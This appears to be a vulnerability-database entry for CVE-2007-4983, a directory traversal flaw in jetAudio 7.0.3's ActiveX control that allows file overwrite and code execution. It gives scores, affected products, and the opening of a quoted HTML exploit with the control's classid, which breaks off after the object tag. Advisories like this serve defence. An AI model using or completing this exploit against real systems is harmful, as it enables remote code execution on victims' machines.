10
CVSSv2

CVE-2007-4983

Published: 19/09/2007 Updated: 29/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Directory traversal vulnerability in the JetAudio.Interface.1 ActiveX control in JetFlExt.dll in jetAudio 7.0.3 Basic and 7.0.3.3016 allows remote malicious users to create or overwrite arbitrary local files via a ..\ (dot dot backslash) in the second argument to the DownloadFromMusicStore method. NOTE: some of these details are obtained from third party information. NOTE: this can be leveraged for code execution by overwriting JetAudio.exe, which is launched by the control after completion of the method call.

Vulnerable Product Search on Vulmon Subscribe to Product

cowon america jetaudio 7.0.3.3016

cowon america jetaudio 7.0.3_basic

Exploits

<HTML> <!-- jetAudio 7x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit Bug discovered by Krystian Kloskowski (h07) <h07@interiapl> Tested on: - jetAudio 703 Basic - Microsoft Internet Explorer 6 Just for fun ;) --> <object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object ...